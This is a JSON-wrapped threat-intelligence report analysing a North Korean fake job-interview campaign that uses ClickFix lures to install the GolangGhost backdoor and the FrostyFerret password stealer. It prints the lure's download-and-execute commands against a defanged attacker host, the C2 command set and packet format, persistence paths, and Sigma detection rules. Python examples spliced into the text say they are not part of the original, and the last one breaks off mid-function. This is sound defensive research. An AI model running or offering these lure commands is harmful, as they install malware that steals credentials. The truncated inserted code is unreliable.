{
	"id": "19d79dad-2340-4670-8662-0d3a07d6d384",
	"created_at": "2026-04-06T00:16:56.093979Z",
	"updated_at": "2026-04-10T03:38:20.635001Z",
	"deleted_at": null,
	"sha1_hash": "ee014dd867eed637d08c84509af57fe141d58c21",
	"title": "From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2848261,
	"plain_text": "From Contagious to ClickFake Interview: Lazarus leveraging the\r\nClickFix tactic\r\nBy Amaury G.,\u0026nbsp;Coline Chavane,\u0026nbsp;Felix Aimé\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2025-03-31 · Archived: 2026-04-05 19:12:15 UTC\r\nThis post was originally distributed as a private FLINT report to our customers on 21 March 2025. The report detailed\r\nfindings about the Lazarus ClickFake Interview campaign.\r\nTable of contents\r\nIntroduction\r\nLazarus: a persistent threat to cryptocurrencies\r\nFrom Contagious to ClickFake Interview\r\nNew fake websites for interview\r\nWindows infection chain\r\nmacOS infection chain\r\nFrostyFerret\r\nGolangGhost – An interpreted Go backdoor\r\nInterview schemes: how CeFi become prime targets\r\nDetection \u0026 Hunting Opportunities\r\nConclusion\r\nIoCs and technical details\r\nNetwork\r\nFiles hashes\r\nYARA rules\r\nIntroduction\r\nIn March 2025, Bybit, an UAE-based crypto exchange platform, was targeted by Lazarus, a state-sponsored intrusion set\r\nattributed to the Democratic People’s Republic of Korea (DPRK), leading to the theft of $1.5 billion, which represents a\r\nrecord-breaking crypto heist in history.\r\nThe targeting of the cryptocurrency ecosystem by North-Korean threat groups is not new. Indeed, this country has used\r\ncyber operations as a means to bypass international sanctions and to finance its ballistic missile and nuclear weapons\r\nprograms since at least 2014. According to Chainalysis, in 2024 DPRK threat actors stole more from cryptocurrency\r\nplatforms than ever with an estimated heist of $1.3 billion in 2024 compared to $660.5 million in 2023.\r\nA recent TDR investigation on Lazarus attempts to target the cryptocurrency industry led to the discovery of a malicious\r\ncampaign targeting job seekers with fake job interview websites we dubbed internally ClickFake Interview. 
Compared to\r\npreviously documented campaigns against job seekers in the cryptocurrency industry like Operation Dream Job and\r\nContagious Interview, ClickFake Interview leverages fake job interview websites to deploy a Go backdoor – GolangGhost –\r\non Windows and macOS environments by using the now infamous ClickFix tactic.\r\nThe infrastructure of ClickFake Interview aligns with technical indicators linked to the Contagious Interview campaign,\r\nwhich has been ongoing since at least December 2022. This led Sekoia’s analysts to assess that the investigated campaign is a\r\ncontinuation of Contagious Interview. Indeed, the two campaigns share a similar process leading to the\r\ninfection through fake job interviews and overlapping infrastructure, while different techniques are used to gain initial\r\naccess.\r\nIn this report, we describe the investigation leading to the discovery of the campaign attributed to Lazarus and dive into\r\nthe infection chain used to target cryptocurrency job seekers.\r\nKey Takeaways\r\nLazarus is a state-sponsored threat actor which has been targeting the cryptocurrency industry since at least 2017 to\r\ngenerate revenue for North Korea. It is characterised by its ability to leverage various tools, malware and infection\r\nvectors and to quickly adapt its Tactics, Techniques and Procedures (TTPs) to evade detection.\r\nA TDR investigation into Lazarus attempts to target the cryptocurrency industry led to the discovery of a new campaign\r\ndubbed ClickFake Interview. It uses legitimate-looking fake job interview websites to apply the ClickFix tactic and install\r\nWindows and macOS backdoors.\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 1 of 16\n\nThe infection chain varies by operating system: on Windows, a VBS script downloads and executes the\r\nGolangGhost backdoor via NodeJS. 
On macOS, a Bash script downloads and extracts malicious components,\r\nthen executes FrostyFerret to steal the system password before launching GolangGhost. This final implant enables\r\nremote control and data theft, including browser information exfiltration.\r\nSekoia’s analysts assess with high confidence that this campaign is in the continuity of Contagious Interview, a\r\ncampaign documented by Palo Alto in November 2023.\r\nThis campaign particularly targets centralised finance entities. It aligns with the 2024 trend of Lazarus shifting from\r\ntargeting decentralised finance to centralised finance.\r\nFake job offers are designed to attract profiles other than software developers and engineers. This may reflect\r\na new Lazarus strategy aimed at targeting cryptocurrency industry employees with limited technical expertise,\r\nmaking them less likely to recognise the malicious command during the interview.\r\nLazarus: a persistent threat to cryptocurrencies\r\nLazarus is a state-sponsored intrusion set attributed to the 3rd Department of the Reconnaissance General Bureau of the\r\nDemocratic People’s Republic of Korea (DPRK) and has been active since at least 2009. Its primary motivation is\r\nespionage, especially against the defence industry, while it also conducts operations for financial gain, notably\r\ntargeting finance and cryptocurrency entities.\r\nLazarus has targeted entities in Europe, Japan, Taiwan, South Korea, the Middle East, Latin America and the US. It has\r\nrelied on a wide range of malware and tools to achieve its objectives, including a wiper (Sharpknot), spyware (Manuscrypt),\r\nransomware (VHD) and trojanised applications (PondRAT), and has exploited vulnerabilities in open-source software as well as\r\nzero-day vulnerabilities.\r\nIts mastery of a broad arsenal of malware is also explained by Lazarus’ ability to constantly evolve its Tactics,\r\nTechniques and Procedures (TTPs), making this threat particularly sophisticated. 
\r\nLazarus has targeted cryptocurrency entities since at least 2017 to generate revenue for the DPRK. It has leveraged several\r\ninfection vectors to achieve its objective. The most common ones used to target cryptocurrency entities, employees and\r\nusers are supply chain attacks, malicious packages on GitHub, trojanised applications and fake job offers.\r\nSekoia differentiates Lazarus from other sub-clusters of malicious activity like Bluenoroff, Andariel and TEMP.Hermit.\r\nDespite overlaps in infrastructure, malware and tools, they tend to use different Tactics, Techniques and Procedures (TTPs).\r\nIn February 2025, a TDR investigation into Lazarus attempts to target the cryptocurrency industry led to the discovery of a\r\nmalicious campaign targeting job seekers with fake job interview websites, dubbed internally ClickFake Interview. Sekoia\r\nassesses with high confidence that this operation is in the continuity of the Contagious Interview campaign first documented\r\nby Palo Alto.\r\nContagious Interview is a malicious campaign ongoing since at least December 2022 and attributed to Lazarus. It has\r\ntargeted software developers through fake job interviews. Job seekers were contacted via LinkedIn or X to plan a video call\r\nfor a job interview. During the meeting, they were asked to download a project from GitHub that was trojanised with the\r\nBeaverTail infostealer. In some cases, BeaverTail downloads a second-stage payload called InvisibleFerret. InvisibleFerret\r\nsupports functions such as remote control, data exfiltration, browser credential theft and keylogging.\r\nThe objective of Contagious Interview is to obtain remote access and steal sensitive information from a user, including\r\ncredentials, cryptocurrency wallets and browser information. Since Palo Alto documented the campaign in November 2023,\r\nseveral variants have been found. 
SentinelOne observed further variants of InvisibleFerret targeting macOS environments.\r\nThree variants, FriendlyFerret, FrostyFerret and FlexibleFerret, were deployed during a job interview process on a\r\nlegitimate website. A link with an error message about activating the camera appears, encouraging the target to install or update\r\nsoftware to launch the interview. Once executed, it downloads the malicious payloads onto the targeted device.\r\nAs of March 2025, the Contagious Interview campaign is still ongoing. Sekoia’s analysts assess it has evolved into a new\r\nsub-campaign, called ClickFake Interview, which leverages fake job interviews and the ClickFix tactic to deploy Windows\r\nand macOS backdoors.\r\nNew fake websites for interview\r\nIt all starts with operators sending users a URL on social media, inviting them to a fake cryptocurrency-related\r\ninterview on a website. As an illustration, a post from late 2024 on X shows a screenshot of a conversation with\r\nan operator from the Contagious Interview campaign. 
During this exchange, the operator conveys interest in a potential\r\ncandidate and suggests they visit a third-party website to take a brief remote interview so that the operator can gather\r\nadditional insights about them.\r\nOnce users land on a fake interview website, they are led through an interview process comprising the following steps:\r\nFilling out a contact form;\r\nResponding to three open-ended questions about cryptocurrencies;\r\nRecording an introductory video using the camera;\r\nPreparing for the interview.\r\nHere is the user’s experience when they first land on the webpage after receiving an invitation link:\r\n[Video: 0:58 walkthrough of the fake interview website]\r\nWe analysed the latest interface of dozens of fake interview websites that emerged in early 2025. These sites are built with\r\nReactJS and load the entire website content dynamically from a single minified JavaScript file hosted under\r\n/assets/index-[RANDOM].js .\r\nEach website shares the same user interface and stepper, which are populated using data from the JavaScript file generated by\r\nReactJS. Within each minified JS file, there is a structured JSON object. The keys in this object are invitation\r\nidentifiers – used in the invitation link’s URL https://[DOMAIN]/invite/[UUID] – and the values contain job interview\r\ndetails such as the role, questions, company, test duration, and more. 
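As an added example (not part of the original post, and neither the campaign's nor Sekoia's code), the following Python script pulls the invitation objects and their BackendURL values out of a bundle of the shape just described. The bundle content, the variable names and the staging-C2 hostname in it are constructed for the example; the only structure it relies on from the post is that each invitation carries a uuid field and a BackendURL. Anchoring on the uuid field rather than on a variable name keeps the extraction working when the minifier renames everything else.

```python
import json
import re

# Constructed sample of a minified ReactJS bundle of the kind described above
# (not a real capture): the invitation map uses unquoted top-level keys, each
# value is a JSON-style object, and BackendURL is a placeholder for the
# staging C2. Real files are minified to a single multi-kilobyte line.
SAMPLE_BUNDLE = (
    'var e=function(){return null};'
    'const t={b2t7f9q1:{\"uuid\":\"b2t7f9q1\",\"testName\":\"Archblock-Marketing-Manager\",'
    '\"companyName\":\"Archblock\",\"roleName\":\"Blockchain Advisor\",\"questionCount\":3,'
    '\"BackendURL\":\"https://api.staging-c2.invalid\",\"companyURL\":\"https://www.archblock.com\",'
    '\"redirectURL\":[\"/invite/b2t7f9q1/quiz\",\"/invite/b2t7f9q1/vintro\",\"/invite/b2t7f9q1/iprep\"]},'
    'k8m1zpu3:{\"uuid\":\"k8m1zpu3\",\"testName\":\"Example-Business-Dev\",\"companyName\":\"Example Co\",'
    '\"roleName\":\"Business Development Manager\",\"questionCount\":3,'
    '\"BackendURL\":\"https://api.staging-c2.invalid\"}};'
    'function n(u){return t[u].BackendURL}'
)

UUID_RE = re.compile(r'\"uuid\"\s*:\s*\"([A-Za-z0-9]+)\"')


def object_at(text, start):
    # text[start] is '{'. Walk forward, tracking nesting and JS string
    # literals, and return the slice up to the matching '}' (None if unbalanced).
    depth = 0
    quote = None
    i = start
    while i < len(text):
        c = text[i]
        if quote is not None:
            if ord(c) == 92:          # backslash: skip the escaped character
                i += 1
            elif c == quote:
                quote = None
        elif c == '\"' or c == chr(39):
            quote = c
        elif c == '{':
            depth += 1
        elif c == '}':
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
        i += 1
    return None


def extract_invitations(bundle):
    # Anchor on the uuid field rather than on a variable name, since the
    # minifier renames everything else. Walk back to the enclosing '{',
    # cut the balanced object and parse it as JSON.
    found = []
    for m in UUID_RE.finditer(bundle):
        start = bundle.rfind('{', 0, m.start())
        if start < 0:
            continue
        raw = object_at(bundle, start)
        if raw is None:
            continue
        try:
            obj = json.loads(raw)
        except ValueError:
            continue
        if obj.get('uuid') == m.group(1):
            found.append(obj)
    return found


def staging_c2s(invitations):
    # Distinct BackendURL values: the staging C2 each invitation will call.
    return sorted({i['BackendURL'] for i in invitations if 'BackendURL' in i})


if __name__ == '__main__':
    invs = extract_invitations(SAMPLE_BUNDLE)
    for inv in invs:
        print(inv['uuid'], inv['companyName'], inv['roleName'], inv['BackendURL'])
    print('staging C2s:', staging_c2s(invs))
```

Run against a saved index-[RANDOM].js, the staging_c2s output is the list of hosts worth pivoting on in proxy logs, and the redirectURL entries give the stepper paths of the site.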
Each website includes around 10 invitations,\r\neach with its own data.\r\n{\r\n  b2t7f9q1: {\r\n    \"uuid\":\"b2t7f9q1\",\r\n    \"testName\":\"Archblock-Marketing-Manager\",\r\n    \"companyName\":\"Archblock\",\r\n    \"roleName\":\"Blockchain Advisor\",\r\n    \"questionCount\":3,\r\n    \"testDurationInMinute\":\"20\",\r\n    \"BackendURL\":\"https://[STAGING C2]\",\r\n    \"companyURL\":\"https://www.archblock.com\",\r\n    \"timeLimitInMinute\":15,\r\n    \"recordTimeInSeconds\":300,\r\n    \"redirectURL\":[\r\n      \"/invite/b2t7f9q1/quiz\",\r\n      \"/invite/b2t7f9q1/vintro\",\r\n      \"/invite/b2t7f9q1/iprep\"\r\n    ],\r\n    \"responsibilities\":[TRUNCATED],\r\n    \"keyrequirements\":[TRUNCATED],\r\n    \"questions\":[TRUNCATED]\r\n  },\r\n  k8m1zpu3: {\r\n    [...]\r\n  },\r\n  [...]\r\n}\r\nThe entire setup, meticulously designed to build user trust, proceeds smoothly until the user is asked to enable their camera.\r\nAt this point, an error message appears indicating that the user needs to download a driver to fix the issue. This is where the\r\noperator employs the ClickFix technique.\r\nDepending on the user’s operating system, deduced from the User-Agent of their browser, an error message is presented\r\nwith commands to copy, paste and run on their system.\r\nWindows\r\nAccess to your camera or microphone is currently blocked.\r\nThe camera drive discoverer on Windows has a race condition in its cache usage. 
This means\r\nmultiple processes or threads accessing the cache at the same time can cause problems like:\r\nDevices may not show correctly, or the cache might contain invalid data.\r\nCameras might not appear, or detection might fail when multiple devices are connected.\r\nSome cameras could appear more than once or not be detected at all.\r\nHere is the solution identified for the issue.\r\nOpen Command Prompt on Windows\r\nPress Windows Key + R to open the Run dialog.\r\nType cmd and press Enter. This opens the Command Prompt.\r\nUpdate Camera drivers on Windows\r\nTo automatically update the latest drivers for Windows, use the following curl command.\r\ncurl -k -o \"%TEMP%\\nvidiadrivers.zip\" https://api.smartdriverfix[.]cloud/nvidiadrivers-kp9s.update \u0026\u0026 powershell -Command \"Expand-Archive -Force -Path\r\n'%TEMP%\\nvidiadrivers.zip' -DestinationPath '%TEMP%\\nvidiadrivers'\" \u0026\u0026 wscript\r\n\"%TEMP%\\nvidiadrivers\\update.vbs\"\r\nMac\r\nAccess to your camera or microphone is currently blocked.\r\nThe Camera drive discoverer on macOS has a race condition in its cache usage. This means multiple processes or threads\r\naccessing the cache at the same time can cause problems like:\r\nMultiple processes accessing the cache at the same time may result in incomplete data.\r\nCache access might fail under heavy use or when multiple threads are involved.\r\nPoor handling of concurrent access could slow things down or cause deadlocks.\r\nConnected devices might be skipped, misidentified, or duplicated during discovery.\r\nThis makes the component unreliable, especially in multi-threaded or high-load scenarios.\r\nHere is the solution identified for the issue.\r\nOpen Terminal on MacOS\r\nPress Command (⌘) + Space on your keyboard. This opens Spotlight Search.\r\nIn the search bar that appears, type “Terminal”.\r\nPress Enter, and the Terminal application will open.\r\nUpdate FFMPEG Drivers on MacOS\r\nTo automatically update the latest FFMPEG Drivers for MacOS, use the following curl command.\r\ncurl -k -o /var/tmp/coremedia.sh https://api.smartdriverfix[.]cloud/coremedia-kp9s.sh \u0026\u0026\r\nchmod +x /var/tmp/coremedia.sh \u0026\u0026 nohup bash /var/tmp/coremedia.sh \u003e/dev/null 2\u003e\u00261 \u0026\r\nThese commands use curl to download and execute a malicious bash script for macOS users ( coremedia.sh ) or, for\r\nWindows users, to download a ZIP archive ( nvidiadrivers.zip ), extract its contents and run a VBS script ( update.vbs ) from the\r\narchive. Note the -k flag in both commands: certificate validation is disabled, so the staging server does not even need a\r\nvalid TLS certificate.\r\nIt is worth mentioning that if an incorrect User-Agent is provided when requesting these URLs (here on\r\napi.smartdriverfix[.]cloud ), two decoy files are served instead: an image for macOS users, and for Windows\r\nusers a decoy archive containing a real driver.\r\nThe diagram below outlines the complete infection chain for both macOS and Windows, following the execution of the\r\nprovided command in the user’s terminal.\r\nOn Windows, a NodeJS downloader is used, whereas on macOS the process relies on a Bash script. Despite these distinct\r\napproaches, both ultimately lead to the persistent installation of a Go implant on the compromised host. It is worth\r\nmentioning that on macOS a stealer, dubbed FrostyFerret by the industry, is executed to retrieve the user’s system\r\npassword.\r\nWindows infection chain\r\nOn Windows, the downloader is launched by the update.vbs script executing the command line cmd /c node nvidia.js. 
This\r\ndownloader is built on the NodeJS framework and fetches a ZIP archive named nvidiadrivers.zip hosted at the\r\nfollowing URL: https://api.smartdriverfix[.]cloud/nvidiawins-update .\r\nOnce fetched, the archive’s content is extracted under the directory C:\\Users\\[USERNAME]\\AppData\\Local\\Temp\\nvidia-drivers\\ using the tar utility. Following this, it executes another VBS script, also called update.vbs, present among the\r\nextracted files, and ensures persistence by calling reg.exe to create a value named NvidiaDriverUpdate under\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the data wscript.exe C:\\Users\\\r\n[USERNAME]\\AppData\\Local\\Temp\\nvidia-drivers\\update.vbs .\r\nThe second update.vbs is designed to execute a Batch file named go_batch.bat, a launcher that shows the\r\nuser a decoy progress bar while silently starting the final Go backdoor we called GolangGhost, named nvidiaupdate.go .\r\nmacOS infection chain\r\nThe bash downloader dubbed coremedia.sh merely downloads a ZIP archive selected according to the processor architecture to\r\n/var/tmp/VCam.zip , extracts its content into /var/tmp/VCam/ , and then creates a plist file serving as a service,\r\n/Library/LaunchAgents/com.drive.plist , which points to a bash file named cloud.sh . It then executes the FrostyFerret\r\nstealer, named DriverPackX.app , to retrieve the user’s system password.\r\nAs in the Windows variant, cloud.sh runs the Go source without compiling it first, by issuing the command line ./bin/go\r\nrun server.go .\r\nFrostyFerret\r\nThe file DriverPackX.app is already known and partially documented under the name FrostyFerret by SentinelOne, or as\r\nChromeUpdateAlert by dmpdump. 
FrostyFerret uses the same icon as Chrome.\r\nWhen executed, it presents a fake window that mirrors the macOS native UI, claiming that Chrome needs access to the\r\nuser’s camera or microphone, followed by a prompt requesting the user’s system password. Regardless of whether the user\r\nenters an empty or incorrect password, an alert appears stating that the password is invalid, and the entered password is\r\nexfiltrated to Dropbox. It is likely used afterwards to access the user’s keychain.\r\nGolangGhost – An interpreted Go backdoor\r\nThe Go malware is designed for remote control and data theft and its features have already been partially documented by\r\nSonatype and dmpdump. Due to its backdoor and data-stealing capabilities, we named it GolangGhost. It is designed for\r\nWindows and macOS with Chrome browser stealer capabilities based on the HackBrowserData project. After registering the\r\nvictim with the C2, it accepts a variety of commands to execute, such as:\r\nValue | Name | Task\r\nqwer | COMMAND_INFO | Retrieve contextual info about the session\r\nasdf | COMMAND_UPLOAD | Push a file onto the victim’s workstation\r\nzxcv | COMMAND_DOWNLOAD | Retrieve a file from the victim’s computer\r\nvbcx | COMMAND_OSSHELL | Execute a shell command\r\nqmwn | SHELL_MODE_WAITGETOUT | Not implemented\r\nqalp | SHELL_MODE_DETACH | Not implemented\r\nghdj | COMMAND_WAIT | Wait for a duration in seconds\r\nr4ys | COMMAND_AUTO | Launch Chrome stealer\r\n89io | AUTO_CHROME_GATHER | Not implemented\r\n7ujm | AUTO_CHROME_PREFRST | Not implemented\r\ngi%# | AUTO_CHROME_COOKIE | Not implemented\r\nkyci | AUTO_CHROME_KEYCHAIN | Not implemented\r\ndghh | COMMAND_EXIT | Send an exit message to the C2 and quit the process\r\nfwe9 | MSG_INFO | Send host system information to the C2. This command is executed in an infinite loop.\r\nSince GolangGhost is interpreted rather than compiled, its analysis is relatively easy. When launched, it creates a unique\r\nrandom ID for each victim, storing it in a .host file within the temporary directory. 
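To make the C2 packet format described in this section concrete, here is an added Python model of the packetMake encoding and its inverse (example code written for this page, not GolangGhost's own source): a 128-byte per-request RC4 key, the RC4 ciphertext, then an MD5 over key and ciphertext. The field values come from the check-in table in this section; the newline used to join the base64 fields and the fixed key used in the test are assumptions made for the example. The practical point is that the key travels in the clear, so a captured POST body decrypts with nothing but this layout.

```python
import base64
import hashlib
import os

KEY_LEN = 128   # per-request RC4 key length described in the post
MD5_LEN = 16


def rc4(key, data):
    # Textbook RC4 (KSA then PRGA). Encryption and decryption are the same call.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def packet_make(plaintext, key=None):
    # Layout from the post: key || RC4(key, plaintext) || MD5(key || ciphertext).
    # The MD5 only catches corruption; it is not a MAC, since anyone holding
    # the blob can recompute it. A fixed key is accepted for reproducible tests.
    key = os.urandom(KEY_LEN) if key is None else key
    ct = rc4(key, plaintext)
    return key + ct + hashlib.md5(key + ct).digest()


def packet_parse(blob):
    # Inverse of packet_make. The key travels in the clear at the front of the
    # packet, so a captured POST body decrypts without any secret.
    if len(blob) < KEY_LEN + MD5_LEN:
        raise ValueError('packet too short')
    key, ct, digest = blob[:KEY_LEN], blob[KEY_LEN:-MD5_LEN], blob[-MD5_LEN:]
    if hashlib.md5(key + ct).digest() != digest:
        raise ValueError('md5 mismatch')
    return rc4(key, ct)


def encode_fields(fields):
    # The post shows each field base64-encoded before packetMake; joining the
    # fields with a newline is an assumption made for this example.
    return '\n'.join(base64.b64encode(f.encode()).decode() for f in fields).encode()


def decode_fields(plaintext):
    # Tolerate the missing base64 padding seen in the check-in table.
    out = []
    for part in plaintext.decode().split('\n'):
        out.append(base64.b64decode(part + '=' * (-len(part) % 4)).decode())
    return out


if __name__ == '__main__':
    fields = ['508259eb', 'fwe9', 'desktop-5012-vm\\tyrell_wellick', 'windows', 'amd64', '2.0.1']
    blob = packet_make(encode_fields(fields))
    print(len(blob), 'bytes;', decode_fields(packet_parse(blob)))
```

For hunting, packet_parse is the useful half: applied to a body captured from one of the listed C2 ports, it yields the base64 fields directly, and an md5 mismatch tells you the capture was truncated rather than that a key is missing.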
It ensures that only one instance of the\r\nmalware runs on the system at any given time. A .store file, which holds the process ID of the implant, can also be\r\nfound, as well as a .ses file that contains a timestamp and the machine identifier.\r\nWhen GolangGhost is executed, it establishes a communication channel to a hardcoded C2. The following data are sent to the C2 in\r\nan encrypted form via HTTP POST requests:\r\nName | Raw value before the packetMake call (base64) | Clear value\r\nUUID generated, referred to as “MACHINEID_FILE_NAME” | 508259eb | 508259eb\r\nMSG_INFO function name | ZndlOQ== | fwe9\r\nDevice name and user name | ZGVza3RvcC01MDEyLXZtXHR5cmVsbF93ZWxsaWNr= | desktop-5012-vm\\tyrell_wellick\r\nDevice name | ZGVza3RvcC01MDEyLXZtd2luZG93cw | desktop-5012-vm\r\nOS name | d2luZG93cw== | windows\r\nProcessor and architecture | YW1kNjQ= | amd64\r\nCalled “DAEMON_VERSION” in the Go source code | Mi4wLjE= | 2.0.1\r\nA function called packetMake is called to encrypt this data. For each request, this function encrypts the data with RC4 using a\r\n128-byte key generated on the fly. Next, a byte array is populated with the key, the encrypted data, and the MD5 sum of\r\nthe key and the encrypted data together. Because the key is transmitted alongside the ciphertext, this encoding provides\r\nobfuscation rather than confidentiality: anyone holding a captured request can decrypt it.\r\nTo conclude, GolangGhost can execute several commands received from the C2. These commands include uploading and\r\ndownloading files, executing shell commands, retrieving contextual information about the infected machine, and stealing\r\nusers’ browsing data. Additionally, the source code contains traces of previously reported malicious domains, suggesting that\r\nthe malware has been adapted or updated over time.\r\nInterview schemes: how CeFi became prime targets\r\nBy collecting data (i.e. 
JSON objects) included in all the fake interview websites we identified, we were able to determine\r\nwhich companies were unknowingly used as lures for these fake interviews. Our analysis is based on 184 different\r\ninvitations retrieved from fake interview websites.\r\nAmong these invitations, we found 14 company names used to lure the victim into completing the application process. The\r\ngraph below shows the companies most often used to convince the victim to engage in the interview process.\r\nThese companies are all related to the cryptocurrency industry. Nine out of 14 provide centralised finance (CeFi)\r\nservices, which refers to financial services built around cryptocurrency that rely on intermediaries, such as exchanges and\r\nlending platforms, to facilitate transactions. These platforms are called “centralised” because they require users to trust a\r\ncentral entity to manage funds, process transactions and ensure security. Coinbase, KuCoin, Kraken, Circle, Securitize,\r\nBlockFi, Tether, Bybit and Robinhood are the CeFi companies in this set. Most of them operate an\r\nexchange platform, while others are stablecoin issuers, specialists in tokenised securities or providers of cryptocurrency\r\ntrading services.\r\nOnly one company provides decentralised finance (DeFi) services: Archblock. The others offer solutions related\r\nto blockchain and cryptocurrency, such as blockchain-based payment solutions, blockchain analysis and compliance\r\nservices.\r\nThis targeting aligns with Lazarus’ focus on cryptocurrency-related entities. 
It also highlights a trend observed in 2024\r\nof DPRK-nexus threat actors shifting to increasingly target CeFi instead of DeFi services.\r\nTDR analysts also investigated the types of jobs used to lure the targets into downloading the malicious payloads.\r\nNone of the positions corresponded to technical profiles in software development. They are mainly manager positions\r\nfocusing on business development, asset management or product development, or decentralised finance specialists.\r\nThis is a significant change from previously documented campaigns attributed to DPRK-nexus threat actors and based on fake\r\njob interviews, which mainly targeted developers and software engineers.\r\nDetection \u0026 Hunting Opportunities\r\nAs detailed previously, the infection chain relies on the ClickFix technique. However, the attacker has adapted this\r\ntechnique to make it more discreet.\r\nIn more typical cases, ClickFix relies either on downloading and executing via mshta.exe, which is quite noticeable, or via\r\npowershell.exe with a relevant cmdlet. In this scenario, the attacker uses curl.exe to download their archive, then\r\ndecompresses it using powershell.exe , and finally executes the infection script via wscript.exe . Individually, these\r\nactions are fairly common. 
It is their sequential execution within a short time frame by the same parent process that makes\r\ndetection possible.\r\nUsing Sigma correlation, this behaviour can be detected by creating individual detection rules for each action (curl\r\ndownload, decompression and script execution) and correlating them by hostname and parent PID over a 2-minute\r\ntime frame.\r\nname: curl\r\ndetection:\r\n  selection:\r\n    process.name: 'curl.exe'\r\n    process.command_line|contains|all:\r\n      - '-k'\r\n      - '-o'\r\n      - 'temp'\r\n    process.parent.pid: '*'\r\n  condition: selection\r\n---\r\nname: powershell\r\ndetection:\r\n  selection:\r\n    process.name: 'powershell.exe'\r\n    process.command_line|contains|all:\r\n      - 'Expand-Archive'\r\n      - 'temp'\r\n      - 'force'\r\n    process.parent.pid: '*'\r\n  condition: selection\r\n---\r\nname: wscript\r\ndetection:\r\n  selection:\r\n    process.name: 'wscript.exe'\r\n    process.command_line|contains: 'temp'\r\n    process.parent.pid: '*'\r\n  condition: selection\r\n---\r\naction: correlation\r\ntype: temporal\r\nrule:\r\n  - curl\r\n  - powershell\r\n  - wscript\r\ngroup-by:\r\n  - host.name\r\n  - process.parent.pid\r\ntimespan: 2m\r\nordered: true\r\nN.B.: Filters are primarily added to limit the number of events that need to be aggregated. Sigma string modifiers such as\r\ncontains are case-insensitive, so 'temp' matches both the literal %TEMP% and the expanded ...\\AppData\\Local\\Temp\\... path that\r\ncmd.exe passes to the child processes.\r\nIn the rule above, the selection criteria are deliberately strict to match the ClickFake Interview scenario.\r\nAnother way to look for ClickFake Interview activity within your network is to use the new Sekoia Operating Language\r\n(SOL). This language allows extensive hunting capabilities and is similar to Microsoft’s KQL. 
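The correlation above, as an added example run over constructed process-creation events (example code written for this page, not Sekoia's detection engine): the three selections are applied per event, then an ordered temporal correlation is evaluated per (host, parent PID) within the 2-minute window. The sample events, hostnames, PIDs and download URLs are made up; the WS01 chain mirrors the lure command, while WS02 (no Expand-Archive stage) and WS03 (second stage outside the window) are controls that must not alert.

```python
from datetime import datetime, timedelta

# Constructed process-creation events (not real telemetry). Keys follow the
# ECS-style field names used in the Sigma rules above. The WS01 chain mirrors
# the lure command; WS02 and WS03 are controls that must not alert.
EVENTS = [
    {'ts': '2025-03-10T10:00:00', 'host.name': 'WS01', 'process.parent.pid': 4120,
     'process.name': 'curl.exe',
     'process.command_line': 'curl -k -o \"%TEMP%\\nvidiadrivers.zip\" https://api.example.invalid/nvidiadrivers.update'},
    {'ts': '2025-03-10T10:00:03', 'host.name': 'WS01', 'process.parent.pid': 4120,
     'process.name': 'powershell.exe',
     'process.command_line': 'powershell -Command \"Expand-Archive -Force -Path %TEMP%\\nvidiadrivers.zip -DestinationPath %TEMP%\\nvidiadrivers\"'},
    {'ts': '2025-03-10T10:00:05', 'host.name': 'WS01', 'process.parent.pid': 4120,
     'process.name': 'wscript.exe',
     'process.command_line': 'wscript \"%TEMP%\\nvidiadrivers\\update.vbs\"'},
    # curl followed directly by wscript, no Expand-Archive stage: chain incomplete
    {'ts': '2025-03-10T10:05:00', 'host.name': 'WS02', 'process.parent.pid': 800,
     'process.name': 'curl.exe',
     'process.command_line': 'curl -k -o %TEMP%\\tool.zip https://files.example.invalid/tool.zip'},
    {'ts': '2025-03-10T10:05:10', 'host.name': 'WS02', 'process.parent.pid': 800,
     'process.name': 'wscript.exe', 'process.command_line': 'wscript %TEMP%\\setup.vbs'},
    # full chain, but the second stage arrives after the 2-minute window
    {'ts': '2025-03-10T11:00:00', 'host.name': 'WS03', 'process.parent.pid': 77,
     'process.name': 'curl.exe', 'process.command_line': 'curl -k -o %TEMP%\\a.zip https://a.example.invalid/a'},
    {'ts': '2025-03-10T11:03:00', 'host.name': 'WS03', 'process.parent.pid': 77,
     'process.name': 'powershell.exe',
     'process.command_line': 'powershell Expand-Archive -Force -Path %TEMP%\\a.zip -DestinationPath %TEMP%\\a'},
    {'ts': '2025-03-10T11:03:05', 'host.name': 'WS03', 'process.parent.pid': 77,
     'process.name': 'wscript.exe', 'process.command_line': 'wscript %TEMP%\\a\\run.vbs'},
]


def contains_all(cmdline, terms):
    # Sigma 'contains' is case-insensitive by default, so 'temp' also covers %TEMP%.
    low = cmdline.lower()
    return all(t in low for t in terms)


# One predicate per Sigma rule above, keyed by the rule name used in the correlation.
RULES = {
    'curl': lambda e: e['process.name'] == 'curl.exe' and contains_all(e['process.command_line'], ('-k', '-o', 'temp')),
    'powershell': lambda e: e['process.name'] == 'powershell.exe' and contains_all(e['process.command_line'], ('expand-archive', 'temp', 'force')),
    'wscript': lambda e: e['process.name'] == 'wscript.exe' and contains_all(e['process.command_line'], ('temp',)),
}
SEQUENCE = ('curl', 'powershell', 'wscript')
TIMESPAN = timedelta(minutes=2)


def matching_rules(event):
    return [name for name, pred in RULES.items() if pred(event)]


def correlate(events, sequence=SEQUENCE, timespan=TIMESPAN):
    # Ordered temporal correlation grouped by (host, parent PID): the stages
    # must fire in order, all within `timespan` of the first stage. A group
    # whose window has expired is discarded and may start over.
    alerts = []
    groups = {}
    for ev in sorted(events, key=lambda e: e['ts']):
        names = matching_rules(ev)
        if not names:
            continue
        gkey = (ev['host.name'], ev['process.parent.pid'])
        ts = datetime.fromisoformat(ev['ts'])
        state = groups.get(gkey)
        if state is not None and ts - state['start'] > timespan:
            groups.pop(gkey)
            state = None
        if state is None:
            if sequence[0] in names:
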